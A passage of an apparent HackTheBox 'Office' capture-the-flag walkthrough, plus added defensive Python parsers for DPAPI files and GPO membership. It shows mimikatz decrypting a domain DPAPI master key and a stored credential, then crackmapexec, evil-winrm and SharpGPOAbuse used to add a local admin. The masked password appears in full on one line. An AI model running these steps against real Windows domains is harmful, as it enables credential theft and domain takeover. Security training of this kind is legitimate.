  dwVersion          : 00000002 - 2
  szGuid             : {191d3f9d-7959-4b4d-a520-a444853c47eb}
  dwFlags            : 00000000 - 0
  dwMasterKeyLen     : 00000088 - 136
  dwBackupKeyLen     : 00000068 - 104
  dwCredHistLen      : 00000000 - 0
  dwDomainKeyLen     : 00000174 - 372
[masterkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : c521daa0857ee4fa6e4246266081e94c
    rounds           : 00004650 - 18000
    algHash          : 00008009 - 32777 (CALG_HMAC)
    algCrypt         : 00006603 - 26115 (CALG_3DES)
    pbKey            : 1107e1ab3e107528a73a2dafc0a2db28de1ea0a07e92cff03a935635013435d75e41797f612903d6eea41a8fc4f7ebe8d2fbecb0c74cdebb1e7df3c692682a066faa3edf107792d116584625cc97f0094384a5be811e9d5ce84e5f032704330609171c973008d84f

[backupkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : a2741b13d7261697be4241ebbe05098a
    rounds           : 00004650 - 18000
    algHash          : 00008009 - 32777 (CALG_HMAC)
    algCrypt         : 00006603 - 26115 (CALG_3DES)
    pbKey            : 21bf24763fbb1400010c08fccc5423fe7da8190c61d3006f2d5efd5ea586f463116805692bae637b2ab548828b3afb9313edc715edd11dc21143f4ce91f4f67afe987005320d3209

[domainkey]
  **DOMAINKEY**
    dwVersion        : 00000002 - 2
    dwSecretLen      : 00000100 - 256
    dwAccesscheckLen : 00000058 - 88
    guidMasterKey    : {e523832a-e126-4d6e-ac04-ed10da72b32f}
    pbSecret         : <snip>
    pbAccesscheck    : 1430b9a3c4ab2e9d5f61dd6c62aab8e1742338623f08461fe991cccd5b3e4621d4c8e322650460181967c409c20efcf02e8936c007f7a506566d66ba57448aa8c3524f0b9cf881afcbb80c9d8c341026f3d45382f63f8665



[backupkey] without DPAPI_SYSTEM: 
  key : 4d1b2c18baba7442e79d33cc771bf54027ae2500e08da3ecfccf91303bd471b6
  sha1: eeb787c4259e3c8b8408201ee5e54fc29fad22b2

[domainkey] with RPC
[DC] 'office.htb' will be the domain
[DC] 'DC.office.htb' will be the DC server
  key : 87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
  sha1: 85285eb368befb1670633b05ce58ca4d75c73c77
```
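Added example, not from the writeup and not mimikatz code: a Python parser for the master key file layout that the `dpapi::masterkey` output above reveals, so the header fields and the four key blocks can be checked without any decryption. It builds a constructed 740-byte file from the values printed above for `191d3f9d-7959-4b4d-a520-a444853c47eb` (GUID, salts, rounds, algorithm ids, the masterkey and backupkey bytes and the accesscheck bytes; `pbSecret` is zero-filled because its value is not reproduced on the page) and parses it back. The `[domainkey]` block is the part that the `/rpc` option hands to the domain controller for decryption, which is why no user password is needed when that path is available; the parser only reads structure and cannot recover any key.

```python
import struct
import uuid

# Layout of a per-user DPAPI master key file (%APPDATA%\Microsoft\Protect\<SID>\<GUID>)
# as mimikatz's dpapi::masterkey prints it: a 128-byte header, then the MASTERKEY,
# BACKUPKEY, CREDHIST and DOMAINKEY blocks whose sizes the header announces.
HEADER = struct.Struct("<III72sIIIQQQQ")   # dwVersion, 2 reserved, szGuid (UTF-16LE), 2 reserved, dwFlags, 4 lengths
KEY_BLOCK = struct.Struct("<I16sIII")      # dwVersion, salt, rounds, algHash, algCrypt; pbKey follows
DOMAIN_HDR = struct.Struct("<III16s")      # dwVersion, dwSecretLen, dwAccesscheckLen, guidMasterKey

ALG_NAMES = {0x8009: "CALG_HMAC", 0x6603: "CALG_3DES", 0x800E: "CALG_SHA_512", 0x6610: "CALG_AES_256"}


def parse_key_block(blob):
    """MASTERKEY / BACKUPKEY block: PBKDF2 parameters plus the encrypted key bytes."""
    version, salt, rounds, alg_hash, alg_crypt = KEY_BLOCK.unpack_from(blob)
    return {"version": version, "salt": salt.hex(), "rounds": rounds,
            "algHash": ALG_NAMES.get(alg_hash, hex(alg_hash)),
            "algCrypt": ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
            "pbKey_len": len(blob) - KEY_BLOCK.size}


def parse_domain_block(blob):
    """DOMAINKEY block: the master key wrapped with the domain backup public key."""
    version, secret_len, check_len, guid = DOMAIN_HDR.unpack_from(blob)
    return {"version": version, "guidMasterKey": str(uuid.UUID(bytes_le=guid)),
            "pbSecret_len": secret_len, "pbAccesscheck_len": check_len,
            "consistent": DOMAIN_HDR.size + secret_len + check_len == len(blob)}


def parse_masterkey_file(data):
    """Split a master key file into its header and blocks; raises on a truncated or inconsistent file."""
    if len(data) < HEADER.size:
        raise ValueError("too short to hold a master key file header")
    version, _, _, guid_raw, _, _, flags, mk_len, bk_len, ch_len, dk_len = HEADER.unpack_from(data)
    if HEADER.size + mk_len + bk_len + ch_len + dk_len != len(data):
        raise ValueError("block lengths in header do not add up to the file size")
    off, blocks = HEADER.size, []
    for length in (mk_len, bk_len, ch_len, dk_len):
        blocks.append(data[off:off + length])
        off += length
    mk, bk, ch, dk = blocks
    return {"version": version, "guid": guid_raw.decode("utf-16-le"), "flags": flags,
            "masterkey": parse_key_block(mk) if mk else None,
            "backupkey": parse_key_block(bk) if bk else None,
            "credhist_len": len(ch),
            "domainkey": parse_domain_block(dk) if dk else None}


# Constructed sample file. Salts, rounds, algorithm ids, GUIDs, pbKey and pbAccesscheck
# bytes are the values mimikatz printed above; pbSecret is a zero placeholder (its real
# value is not reproduced here), so the file is parseable but not decryptable.
MK_PBKEY = ("1107e1ab3e107528a73a2dafc0a2db28de1ea0a07e92cff03a935635013435d7"
            "5e41797f612903d6eea41a8fc4f7ebe8d2fbecb0c74cdebb1e7df3c692682a06"
            "6faa3edf107792d116584625cc97f0094384a5be811e9d5ce84e5f0327043306"
            "09171c973008d84f")
BK_PBKEY = ("21bf24763fbb1400010c08fccc5423fe7da8190c61d3006f2d5efd5ea586f463"
            "116805692bae637b2ab548828b3afb9313edc715edd11dc21143f4ce91f4f67a"
            "fe987005320d3209")
DK_ACCESSCHECK = ("1430b9a3c4ab2e9d5f61dd6c62aab8e1742338623f08461fe991cccd5b3e4621"
                  "d4c8e322650460181967c409c20efcf02e8936c007f7a506566d66ba57448aa8"
                  "c3524f0b9cf881afcbb80c9d8c341026f3d45382f63f8665")


def build_key_block(salt_hex, pb_key_hex):
    # version 2, 18000 rounds, CALG_HMAC / CALG_3DES as in the output above
    return KEY_BLOCK.pack(2, bytes.fromhex(salt_hex), 18000, 0x8009, 0x6603) + bytes.fromhex(pb_key_hex)


def build_sample_file():
    mk = build_key_block("c521daa0857ee4fa6e4246266081e94c", MK_PBKEY)
    bk = build_key_block("a2741b13d7261697be4241ebbe05098a", BK_PBKEY)
    dk = (DOMAIN_HDR.pack(2, 256, 88, uuid.UUID("e523832a-e126-4d6e-ac04-ed10da72b32f").bytes_le)
          + bytes(256) + bytes.fromhex(DK_ACCESSCHECK))
    guid = "191d3f9d-7959-4b4d-a520-a444853c47eb".encode("utf-16-le")
    header = HEADER.pack(2, 0, 0, guid, 0, 0, 0, len(mk), len(bk), 0, len(dk))
    return header + mk + bk + dk


def parse_sample():
    return parse_masterkey_file(build_sample_file())


if __name__ == "__main__":
    data = build_sample_file()
    print(len(data), "bytes")          # 740, the size the directory listing above shows
    for key, value in parse_sample().items():
        print(f"{key:13} {value}")
```

The same structural check is useful on the forensic side: the `guidMasterKey` that `dpapi::cred` prints for a credential blob names which file under `Protect\<SID>` protected it, and the length consistency check flags truncated or tampered master key files before any decryption attempt is made.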

Try all three credential files until you get the password

```powershell
.\mimikatz.exe "dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4  /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166" exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4  /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {191d3f9d-7959-4b4d-a520-a444853c47eb}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 0000003a - 58
  szDescription      : Enterprise Credential Data

  algCrypt           : 00006603 - 26115 (CALG_3DES)
  dwAlgCryptLen      : 000000c0 - 192
  dwSaltLen          : 00000010 - 16
  pbSalt             : 649c4466d5d647dd2c595f4e43fb7e1d
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         : 
  algHash            : 00008004 - 32772 (CALG_SHA1)
  dwAlgHashLen       : 000000a0 - 160
  dwHmac2KeyLen      : 00000010 - 16
  pbHmack2Key        : 32e88dfd1927fdef0ede5abf2c024e3a
  dwDataLen          : 000000c0 - 192
  pbData             : f73b168ecbad599e5ca202cf9ff719ace31cc92423a28aff5838d7063de5cccd4ca86bfb2950391284b26a34b0eff2dbc9799bdd726df9fad9cb284bacd7f1ccbba0fe140ac16264896a810e80cac3b68f82c80347c4deaf682c2f4d3be1de025f0a68988fa9d633de943f7b809f35a141149ac748bb415990fb6ea95ef49bd561eb39358d1092aef3bbcc7d5f5f20bab8d3e395350c711d39dbe7c29d49a5328975aa6fd5267b39cf22ed1f9b933e2b8145d66a5a370dcf76de2acdf549fc97
  dwSignLen          : 00000014 - 20
  pbSign             : 21bfb22ca38e0a802e38065458cecef00b450976

Decrypting Credential:
 * masterkey     : 87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 000000be - 190
  credUnk0       : 00000000 - 0

  Type           : 00000002 - 2 - domain_password
  Flags          : 00000000 - 0
  LastWritten    : 5/9/2023 11:03:21 PM
  unkFlagsOrSize : 00000018 - 24
  Persist        : 00000003 - 3 - enterprise
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : Domain:interactive=OFFICE\HHogan
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : OFFICE\HHogan
  CredentialBlob : H4ppyxxxxxx
  Attributes     : 0
```
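To make sense of the fields mimikatz prints under **BLOB**, here is an added example, written for this page rather than taken from the writeup or from mimikatz, that parses the header of a DPAPI blob in Python. It reads the same fields shown above (provider GUID, master key GUID, flags, description, cipher and hash algorithm IDs, salt/data/signature lengths) so that an analyst can tell which master key file a recovered credential blob depends on, and whether it carries the CRYPTPROTECT_SYSTEM flag, without decrypting anything. The sample blob is constructed: it reuses only the master key GUID, flags and algorithm IDs from the output above, and the salt, ciphertext and signature bytes are filler.

```python
"""Parse the header of a DPAPI blob (the structure mimikatz prints as "BLOB")
to find which master key GUID protected it and which algorithms it names.
Parsing only: no key material is needed and nothing is decrypted."""
import struct
import uuid

# Provider GUID present at the start of every CryptProtectData blob.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
# dwFlags bit: the blob may only be unprotected by a SYSTEM-context caller
# (Credential Manager blobs carry it); the master key is still the user's.
CRYPTPROTECT_SYSTEM = 0x20000000
# wincrypt.h ALG_ID values commonly seen in DPAPI blobs.
ALG_NAMES = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256",
             0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512"}


def _u32(buf, off):
    if off + 4 > len(buf):
        raise ValueError("blob truncated inside a DWORD")
    return struct.unpack_from("<I", buf, off)[0], off + 4


def _guid(buf, off):
    if off + 16 > len(buf):
        raise ValueError("blob truncated inside a GUID")
    return uuid.UUID(bytes_le=bytes(buf[off:off + 16])), off + 16


def _counted(buf, off):
    """DWORD length followed by that many bytes."""
    n, off = _u32(buf, off)
    if off + n > len(buf):
        raise ValueError("length field runs past end of blob")
    return bytes(buf[off:off + n]), off + n


def parse_dpapi_blob(buf):
    """Return the blob's header fields as a dict; raise ValueError if the
    bytes are not a well-formed DPAPI blob."""
    version, off = _u32(buf, 0)
    provider, off = _guid(buf, off)
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob (bad version/provider)")
    mk_version, off = _u32(buf, off)
    mk_guid, off = _guid(buf, off)
    flags, off = _u32(buf, off)
    desc, off = _counted(buf, off)          # UTF-16LE, NUL-terminated
    alg_crypt, off = _u32(buf, off)
    alg_crypt_len, off = _u32(buf, off)     # key length in bits
    salt, off = _counted(buf, off)
    _hmac_key, off = _counted(buf, off)     # legacy field, normally empty
    alg_hash, off = _u32(buf, off)
    _alg_hash_len, off = _u32(buf, off)
    _hmac2_key, off = _counted(buf, off)
    data, off = _counted(buf, off)          # the ciphertext
    sign, off = _counted(buf, off)          # HMAC over the blob
    if off != len(buf):
        raise ValueError("trailing bytes after signature")
    return {
        # File name to look for under ...\Microsoft\Protect\<SID>\
        "masterkey_guid": str(mk_guid),
        "masterkey_version": mk_version,
        "system_flag": bool(flags & CRYPTPROTECT_SYSTEM),
        "description": desc.decode("utf-16-le").rstrip("\x00"),
        "alg_crypt": ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
        "alg_crypt_bits": alg_crypt_len,
        "alg_hash": ALG_NAMES.get(alg_hash, hex(alg_hash)),
        "salt_len": len(salt), "data_len": len(data), "sign_len": len(sign),
    }


def build_sample_blob():
    """Constructed blob whose header mirrors the mimikatz output on this page
    (same master key GUID, flags and algorithm IDs); salt, ciphertext and
    signature are filler bytes, not the real values."""
    def counted(b):
        return struct.pack("<I", len(b)) + b
    desc = "Enterprise Credential Data".encode("utf-16-le") + b"\x00\x00"
    return (struct.pack("<I", 1) + DPAPI_PROVIDER_GUID.bytes_le
            + struct.pack("<I", 1)
            + uuid.UUID("191d3f9d-7959-4b4d-a520-a444853c47eb").bytes_le
            + struct.pack("<I", CRYPTPROTECT_SYSTEM) + counted(desc)
            + struct.pack("<II", 0x6603, 192) + counted(bytes(range(16)))
            + counted(b"")                       # no HMAC key
            + struct.pack("<II", 0x8004, 160) + counted(bytes(range(16, 32)))
            + counted(bytes(192))                # ciphertext placeholder
            + counted(bytes(20)))                # signature placeholder


if __name__ == "__main__":
    for key, value in parse_dpapi_blob(build_sample_blob()).items():
        print(f"{key:18}: {value}")
```

The master key GUID is the piece a responder needs first: it is the file name of the master key under the owning user's `Protect\<SID>` directory, which is how mimikatz knew which master key to pair with this credential file. The `system_flag` result is worth reading carefully: for Credential Manager blobs it means only a SYSTEM-context caller may unprotect the blob, not that the machine master key was used.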

Check that the credentials are valid and whether they allow remote access to the machine

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ crackmapexec smb $ip -u HHogan -p 'H4ppyxxxxxx'                 

SMB      10.10.11.3      445    DC    [+] office.htb\HHogan:H4ppyxxxxxx 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ crackmapexec winrm $ip -u HHogan -p 'H4ppyxxxxxx'

WINRM    10.10.11.3      5985   DC    [+] office.htb\HHogan:H4ppyFtW183# (Pwn3d!)
```

Access the machine as `hhogan`

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ evil-winrm -i $ip -u HHogan -p 'H4ppyxxxxxxx'

*Evil-WinRM* PS C:\Users\HHogan\Documents>
```

> I don't know any tools to abuse GPOs, as I hadn't performed this attack before, so I searched online for one and found `SharpGPOAbuse`

{% embed url="https://github.com/byronkg/SharpGPOAbuse" %}

```powershell
*Evil-WinRM* PS C:\Users\HHogan\Documents> upload SharpGPOAbuse.exe

Info: Upload successful!
```

The GitHub repo also shows how to use it.

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FLdd3oCbpaJ6Gu42yzlXx%2FPasted%20image%2020240714194915.png?alt=media&#x26;token=874c694b-3fc0-4c74-ae2d-4357130e2752" alt=""><figcaption></figcaption></figure>

I will use `--AddLocalAdmin`; these are its options:

```
Options required to add a new local admin:
--UserAccount
        Set the name of the account to be added in local admins.
--GPOName
        The name of the vulnerable GPO.

Example:
        SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"
```

```powershell
*Evil-WinRM* PS C:\Users\HHogan\Documents> Get-GPO -All | Select-Object DisplayName

DisplayName
-----------
Windows Firewall GPO
Default Domain Policy
Default Active Directory Settings GPO
Default Domain Controllers Policy
Windows Update GPO
Windows Update Domain Policy
Software Installation GPO
Password Policy GPO


*Evil-WinRM* PS C:\Users\HHogan\Documents> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount hhogan --GPOName "Default Domain Policy"
[+] Domain = office.htb
[+] Domain Controller = DC.office.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=office,DC=htb
[+] SID Value of hhogan = S-1-5-21-1199398058-4196589450-691661856-1108
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\office.htb\SysVol\office.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
```
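The tool output above shows exactly what the abuse leaves behind: a `[Group Membership]` entry in the GPO's `GptTmpl.inf` under SYSVOL and a bumped version number in `GPT.ini`. The following added example (written for this page, not code from the writeup or from the SharpGPOAbuse project) parses a `GptTmpl.inf` and reports every principal the GPO pushes into the local Administrators group that is not on an allowlist, which is the check a defender would run across all GPOs after an event like this. The sample file content and the allowlist are constructed; the member SID is the hhogan SID printed above, and the allowlisted SID is an assumed Domain Admins SID built from the same domain identifier.

```python
"""Audit the Restricted Groups data in a GPO's GptTmpl.inf. A local admin
added through a GPO lands here as a [Group Membership] entry for the local
Administrators group (S-1-5-32-544), so checking every GPO's GptTmpl.inf
for unexpected members of that group exposes the change directly."""
import re

LOCAL_ADMINS_SID = "S-1-5-32-544"
# Principals a GPO may legitimately push into local Administrators.
# Constructed allowlist for this example: the domain's Domain Admins
# (RID 512) under the domain SID seen on this page.
ALLOWED_ADMIN_SIDS = {"S-1-5-21-1199398058-4196589450-691661856-512"}


def parse_inf(text):
    """Minimal INF/INI parser returning {section: {key: value}}; keys keep
    their case and leading '*'. GptTmpl.inf on disk is UTF-16, so decode
    the file before passing its contents here."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = sections.setdefault(header.group(1), {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        current[key.strip()] = value.strip()
    return sections


def group_memberships(text):
    """Return {group: [members]} from [Group Membership]. Keys look like
    '*S-1-5-32-544__Members'; a leading '*' marks a SID rather than a name,
    and members are comma-separated, each with its own '*' prefix."""
    result = {}
    for key, value in parse_inf(text).get("Group Membership", {}).items():
        group, sep, attr = key.partition("__")
        if not sep or attr != "Members":
            continue
        members = [m.strip().lstrip("*") for m in value.split(",") if m.strip()]
        result[group.lstrip("*")] = members
    return result


def unexpected_local_admins(text, allowed=ALLOWED_ADMIN_SIDS):
    """SIDs/names the GPO adds to local Administrators that are not allowlisted."""
    members = group_memberships(text).get(LOCAL_ADMINS_SID, [])
    return [sid for sid in members if sid not in allowed]


# Constructed GptTmpl.inf content shaped like the file after the AddLocalAdmin
# run above; the member SID is the hhogan SID printed by the tool.
SAMPLE_GPTTMPL = """\
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = *S-1-5-21-1199398058-4196589450-691661856-1108
"""

# Constructed content of an untouched GptTmpl.inf with no Restricted Groups data.
CLEAN_GPTTMPL = """\
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
"""

if __name__ == "__main__":
    print("suspect local admins:", unexpected_local_admins(SAMPLE_GPTTMPL))
    print("clean GPO:", unexpected_local_admins(CLEAN_GPTTMPL))
```

Run this over `\\<domain>\SysVol\<domain>\Policies\<GUID>\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf` for every GPO GUID (the path shape is the one the tool printed above, with the domain and GUID as placeholders). A GPO whose `GPT.ini` version jumps at the same time a new `[Group Membership]` line appears is the footprint this technique leaves; Directory Service change auditing on the `versionNumber` attribute of the `groupPolicyContainer` object gives the same signal from the domain controller side.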

Force a Group Policy update so the change takes effect

```powershell
*Evil-WinRM* PS C:\Users\HHogan\Documents> gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.
```

Once the policy has applied, `hhogan` is a member of the local Administrators group and can read the Administrator's desktop.

```powershell
*Evil-WinRM* PS C:\Users\HHogan\Documents> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

    Directory: C:\Users\Administrator\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         7/14/2024   9:59 AM             34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
abd037fa1e9078e44dxxxxxxxxxxxxxxxxx
```

> Root Flag: abd037fa1e9078e44dxxxxxxxxxxxxxxxxx
